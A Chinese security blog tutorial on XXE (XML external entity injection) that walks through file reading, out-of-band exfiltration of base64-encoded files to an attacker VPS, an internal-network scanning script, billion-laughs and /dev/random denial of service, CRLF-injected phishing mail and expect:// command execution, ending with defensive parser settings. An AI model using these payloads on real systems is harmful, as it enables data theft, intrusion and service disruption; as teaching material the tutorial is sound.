1. 威客安全首页
  2. 默认分类

XXE 打怪升级之路

本文作者:V1ntlyn(信安之路首次投稿作者)

既然这篇文章说的是 xxe 的升级之旅,那么什么是 xxe 呢?

其实 xxe 也是一类注入漏洞,英文全名即 Xml External Entity Injection, 即我们所说的 xml 外部实体注入攻击。

因为实体可以通过预定义在文档中被调用,而实体的标识符又可以访问本地或者远程内容,当允许引用外部实体时,攻击者便可以构造恶意内容来达到攻击。

基础简介

可能有些人看了上面一堆名词后不知所云,什么 xxe,xml,什么外部实体,不用急,我们现在就来慢慢升级。

level 0

xml

首先要先说下 xml。xml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。但是 xml 跟 html 是为不同目的而设计的,html 旨在显示数据信息,而 xml 旨在传输数据信息。

DTD

跟 xml 格式相关的就是这个叫 dtd(document type definition )的东西了,这个 dtd 的作用就是去定义 xml 文档的合法构建模块,也就是说声明了 xml 的内容格式规范。

dtd 有两种声明方式:

1、内部 dtd:即对 XML 文档中的元素、属性和实体的 DTD 的声明都在 XML 文档中。 

2、外部 dtd:即对 XML 文档中的元素、属性和实体的 DTD 的声明都在一个独立的 DTD 文件(.dtd)中。 

让我们来看一下内部 dtd 的 xml 示例:

<!--XML声明--><?xml version="1.0" encoding="UTF-8"?><!--DTD,文档类型声明-->          <!DOCTYPE note [<!ELEMENT note (body)><!ELEMENT body (#PCDATA)><!ENTITY writer "hello word">        ]>
<!--文档元素-->                                                                         <note><body>&writer</body></note>

我们就 dtd 的内容一个一个来看,

1、!DOCTYPE note (第四行)定义此文档是 note 类型的文档。

2、!ELEMENT note (第五行)定义 note 元素有一个元素:”body”

3、!ELEMENT body (第六行)定义 body 元素为 “#PCDATA” 类型

4、!ENTITY writer “hello world”(第七行)定义了一个内部实体

也就是说,这样的 dtd 就定义了 xml 的根元素是 note,然后根元素下有一个 body 子元素,而且 body 元素的类型为“#PCDATA”,这样的定义就固定了文档元素的内容格式,而后面 body 元素里的“&writer”就是对内部实体的一个引用,到输出的时候 &writer 就会被 ”hello world“ 替换,这样说来应该就能大概明白了。

上面我们说的就是一个内部实体的例子,而我们重点在于外部实体,毕竟我们要讲的就是外部实体注入,下面我们再来看一个引用外部实体的例子:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<root>  <body>&xxe</body></root>

1、!ELEMENT foo ANY (第三行)定义元素为 ANY,即可以接受任何元素。

2、!ENTITY xxe SYSTEM “file:///c:/test.dtd”(第四行)定义了一个外部实体

这里样义文档就会对 c:/test.dtd 文件资源进行引用,这是一种用 SYSTEM 关键字的引用方式,还有一种用 PUBLIC 引用公用 DTD 的方式:

<!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”>

通过以上例子,我们可以理解为一个实体其实就是一个变量。

但是实际上实体不止这一种,实体有四种,而我们以上的实体是其中的一种通用实体。

这里列一下:

1、内置实体 (Built-in entities)

2、字符实体 (Character entities)

3、通用实体 (General entities)

4、参数实体 (Parameter entities)

其中内置实体和字符实体都和 html 的实体编码类似,有十进制和十六进制。

而通用实体我们已经大概了解了,就是刚才那两个例子那样的,下面我们再讲一个参数实体的 dtd 例子:

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>"> <!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> %an-element; %remote-dtd;

通过这个 dtd 我们可以看出来区别,就是这里实体名前面有个“%”,而在通用实体中是没有的,并且只能在 dtd 中使用% 实体名,有不同也有相同的地方,和通用实体一样,参数实体也可以外部引用 dtd。所以这里的重点就是参数实体只能在 dtd 中使用,引用。

xxe的利用

level 1

前面已经大概介绍了外部实体的作用和运用,下面我们开始进入主题,那么 xxe 能干什么呢?

通过上面外部实体的例子:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<root>  <body>&xxe</body></root>

有些基础的小伙伴应该马上就能想到一种漏洞利用:任意文件读取

为了呈现直观一点,我在本地搭了一个环境:

xml.php

<?php
    libxml_disable_entity_loader (false);    $xmlfile = file_get_contents('php://input');    $dom = new DOMDocument();    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);     $creds = simplexml_import_dom($dom);    echo $creds;
?>

payloads:

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE creds [  <!ENTITY xxe SYSTEM "file:///c:/windows/system.ini"> ]> <creds>&xxe;</creds>

这个 payload 就是尝试去读取我本地的 c:/windows/system.ini 文件,接下来 post 试下

结果如下:

XXE 打怪升级之路

可以看到成功读取出了 system.ini 文件中的内容。

至此我们已经简单复现了 xxe 一种最简单的利用。

level 2

上面我们成功读取了 system.ini 文件中的内容,可能有的的小伙伴去复现的时候,读取其他文件的时候就有可能发现读取不了,会报错,这是什么原因呢?我们接下来再说一下这种情况。

如果会报错,原因可能就是文件中有一些特殊符号,比如说“<”,“>”,“&”等等这些符号,在引用的时候也给 xml解析器解析了,因此就会报错,从而读取失败。

来模拟一下这种场景,新建一个 test.txt

12343545423#information<info>sslicve<for>test <content>

内容如上,然后读取一下看看:

XXE 打怪升级之路

确实是什么都读不出来,还报了一堆错。

那这种情况怎么解决呢?

这时候就需要认识一个新名词并且会用,就是“CDATA”

XXE 打怪升级之路

也就是说,我们可以将脚本代码定义为“CDATA”,CDATA 部分中的所有内容就会被解析器忽略,也就可以继续愉快地读取文件了。 

我们来试试,把 payload 修改为:

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [<!ENTITY start "<![CDATA[<!ENTITY % xxe SYSTEM "file:///d:/test.txt"> ]]> ">]% xxe;>  
<roottag>&start</roottag>

这样 payload 看起来好像没什么问题,但其实拿这个 payload 去打还是一样读取不出来。

XXE 打怪升级之路

xml 解析器有个限制就是不能在内部 Entity 中引用,“PEReferences forbidden in internal subset in Entity ”指的就是禁止内部参数实体引用。

既然内部不行,那如果我把那内容换到外部呢?试试来

修改 payload:

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [<!ENTITY % start "<![CDATA[">   <!ENTITY % go SYSTEM "file:///d:/test.txt">  <!ENTITY % end "]]>">  <!ENTITY % dtd SYSTEM "http://myvps/evil.dtd"> %dtd; ]> 
<root>&all;</root>

同时在我的 vps 上放一个 evil.dtd,内容为:

<!ENTITY all "%start;%go;%end;">

XXE 打怪升级之路

ok 到这里终于没再出错了。

level 3

实际上现在有回显的 xxe 已经很少了,接下来我们就来想办法在没有 xxe 回显的情况下怎么利用。

既然没有回显数据,那我们就要想办法让服务器自己把数据往外带。

其实在 level 2 中应该就能想到了,既然外部实体能够请求外部 url 资源内容,也就是说可以访问外面 url,这样的话我们可以写两个外部参数实体,第一个用来请求本地数据内容,第二个用 http 协议或者其他协议把请求到的数据作为参数带到我们的 vps,这样就实现了数据外带了。

payload:

<?xml version="1.0"?><!DOCTYPE message [    <!ENTITY % remote SYSTEM "http://myvps/xml.dtd">      <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///d:/test.txt">    %remote;    %send;]><message>1234</message>

xml.dtd

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myvps:1111/?%file;'>">%start;

同时在 vps 上开启 nc 监听 1111 端口,接受数据

XXE 打怪升级之路

XXE 打怪升级之路

ok 成功把数据带出来了,这里要补充的一点是,在 xml.dt d中,之所以要把“%”转成 html 实体编码是因为在实体的值中不能有“%”,所以也就只能转成&#x25了。

level 4

接下来也越来越好玩了,因为上面我们讲到的利用都只是任意文件读取,而 xxe 漏洞的利用远不止这些。

比如说,xxe 由于可以访问外部 url,也就有类似 ssrf 的攻击效果,同样的,也可以利用 xxe 来进行内网探测。

可以先通过 file 协议读取一些配置文件来判断内网的配置以及规模,以便于编写脚本来探测内网。

一个 python 脚本实例:

import requestsimport base64
#Origtional XML that the server accepts#<xml>#    <stuff>user</stuff>#</xml>

def build_xml(string):    xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""    xml = xml + "rn" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""    xml = xml + "rn" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""    xml = xml + "rn" + """<xml>"""    xml = xml + "rn" + """    <stuff>&xxe;</stuff>"""    xml = xml + "rn" + """</xml>"""    send_xml(xml)
def send_xml(xml):    headers = {'Content-Type': 'application/xml'}    x = requests.post('http://127.0.0.1/xml.php', data=xml, headers=headers, timeout=5).text    coded_string = x.split(' ')[-2] # a little split to get only the base64 encoded value    print coded_string#   print base64.b64decode(coded_string)for i in range(1, 255):    try:        i = str(i)        ip = '192.168.1.' + i        string = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'        print string        build_xml(string)    except:      print "error"continue

运行起来大概是这样

XXE 打怪升级之路

既然可以主机探测了,那么内网主机端口探测也是类似的思路。

level 5

除了可以内网探测,还可以 DOS 攻击。。

比如说:

<?xml version="1.0"?><!DOCTYPE lolz [  <!ENTITY lol "lol">  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>

此 payload 测试可以在内存中将小型 XML 文档扩展到超过 3GB 而使服务器崩溃。 

如果目标是 UNIX 系统,

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [   <!ELEMENT foo ANY >  <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>

这段 payload 会让 xml 解析器尝试使用 /dev/random 文件中的内容来替代实体,所以这个示例会直接使 UNIX系统服务器崩溃。

level 6

还有比较好玩的玩法,当然了这个需要在特定类型的场景中运用,比如说 xxe 还可以运用于钓鱼。

(以下实例来源于 freebuf 中的一篇文章)

如果内网中有一台存在 CRLF 注入漏洞的 SMTP 服务器,我们就能利用 ftp:// 协议结合 CRLF 注入向其发送任意命令,也就是可以指定其发送任意邮件给任意人,这样就伪造了信息源,造成钓鱼 。

Java 支持在 sun.net.ftp.impl.FtpClient 中的 ftp URI,因此,我们可以指定用户名和密码,例如 ftp://user:password@host:port/test.txt,FTP 客户端将在连接中发送相应的 USER 命令。

但是如果我们将 %0D%0A (CRLF) 添加到 URL 的 user 部分的任意位置,我们就可以终止 USER 命令并向 FTP 会话中注入一个新的命令,即允许我们向 25 端口发送任意的 SMTP 命令:

ftp://a%0D%0AEHLO%20a%0D%0AMAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0ARCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0ADATA%0D%0AFrom%3A%20support%40VULNERABLESYSTEM.com%0ATo%3A%20victim%40gmail.com%0ASubject%3A%20test%0A%0Atest!%0A%0D%0A.%0D%0AQUIT%0D%0A:a@VULNERABLESYSTEM.com:25

当 FTP 客户端使用此 URL 连接时,以下命令将会被发送给 VULNERABLESYSTEM.com 上的邮件服务器:

ftp://aEHLO aMAIL FROM: <support@VULNERABLESYSTEM.com>RCPT TO: <victim@gmail.com>DATAFrom: support@VULNERABLESYSTEM.comTo: victim@gmail.comSubject: Reset your passwordWe need to confirm your identity. Confirm your password here: http://PHISHING_URL.com.QUIT:support@VULNERABLESYSTEM.com:25

这意味着攻击者可以从从受信任的来源发送钓鱼邮件(例如:帐户重置链接)并绕过垃圾邮件过滤器的检测。除了链接之外,甚至我们也可以发送附件。 

level 7

最吸引人的还是 RCE 了,那么问题来了,xxe 能 RCE 吗?

答案是可以的,不过还是那句话,在特定场景下。

由于 PHP 的 expect 并不是默认安装扩展,如果安装了这个 expect 扩展我们就能直接利用 XXE 进行 RCE 。

示例代码:

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]><dir><file>&cmd;</file></dir>

如何防御

方案一 使用开发语言提供的禁用外部实体的方法

PHP:

libxml_disable_entity_loader(true);

java:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
.setFeature("http://xml.org/sax/features/external-general-entities",false)
.setFeature("http://xml.org/sax/features/external-parameter-entities",false);

python:

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二 黑名单过滤关键字

当然直接过滤掉用户提交的 xml 数据中的关键词也是可以的,

比如说:SYSTEM和PUBLIC

总结

这篇文章我从简单的 xml 的基础知识开始整理,以升级的方式从 xxe 的相关基础到花式利用进行介绍,有些地方限于文章篇幅就没有再继续深入,当然了 xxe 相关利用或者技巧肯定不限于我整理的这几个方面,比如说 xxe 还可以结合 jar 协议进行上传文件,不过笔者对这方面不是很熟也就没有去复盘。文章中若有错误的地方,请各位大牛指正。

参考链接:

https://xz.aliyun.com/t/3357

https://www.freebuf.com/vuls/207639.html

https://security.tencent.com/index.php/blog/msg/69

https://www.freebuf.com/vuls/194112.html

https://www.runoob.com/xml/xml-cdata.html

http://www.mottoin.com/detail/738.html

http://www.w3cschool.cn/dtd  

https://www.freebuf.com/articles/web/177979.html

https://www.freebuf.com/column/188849.html

推荐阅读

原创 【作者投稿】十分钟带你了解XXE

原创 XPath注入:攻击与防御技术

原创 DTD 实体 XXE 浅析

XXE 打怪升级之路

原文始发于微信公众号(信安之路):XXE 打怪升级之路

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论

联系我们

15110186328

在线咨询:点击这里给我发消息

邮件:zhanglei@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code
X